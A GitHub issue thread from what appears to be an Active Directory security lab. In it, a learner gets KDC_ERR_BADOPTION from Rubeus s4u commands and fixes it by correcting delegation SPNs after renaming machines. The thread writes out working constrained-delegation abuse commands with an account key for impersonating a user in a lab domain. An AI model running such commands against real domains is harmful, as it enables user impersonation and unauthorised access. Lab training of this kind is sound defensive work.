### ISSUE TITLE
Exercise #5 : KDC-ERR-BADOPTION

### ISSUE THREAD

**Issue by barismutan** [cfalta/adsec#4]
Hi, I have been trying to follow your tutorial to get into AD security and it has  been very helpful so far. However, I am stuck on exercise 5. When I attempt to execute any of the commands:

`Invoke-Rubeus -Command "s4u /user:taskservice /aes256:390F5466C4FCCB8A04955838C3890D067050B3035886ED97D8D96912E8E70C01 /impersonateuser:bwillis /msdsspn:cifs/adsec-01.contoso.com /ptt"

Invoke-Rubeus -Command "s4u /user:taskservice /aes256:390F5466C4FCCB8A04955838C3890D067050B3035886ED97D8D96912E8E70C01 /impersonateuser:bwillis /msdsspn:host/adsec-01.contoso.com /ptt"

Invoke-Rubeus -Command "s4u /user:taskservice /aes256:390F5466C4FCCB8A04955838C3890D067050B3035886ED97D8D96912E8E70C01 /impersonateuser:bwillis /msdsspn:rpcss/adsec-01.contoso.com /ptt"`

I get the following error:

KRB-ERROR (13) : KDC_ERR_BADOPTION

Any idea why that might be occuring? I have also installed SMBv1 on machine adsec-01.

**Comment by cfalta** [comment]
Hi,

did you verify that the delegation permissions for user taskservice are set correctly? 
It should be enabled for constrained delegation with protocol transition and the SPNs in the allow list should match the SPNs you used in the rubeus command.
These things are initially set by the setup script referenced during lab setup but maybe something went wrong there.

Christoph

**Comment by barismutan** [comment]
Thanks for your response, turns out it was due to me having changed the computer names initially (from adsec-00/adsec-01 to server0/server1). The delegation permissions were registered for adsec-00.contoso.com and adsec-01.contoso.com and it was fixed once I added the entries for the changed names.

**Comment by cfalta** [comment]
Classic ;) good to hear it works for you now.
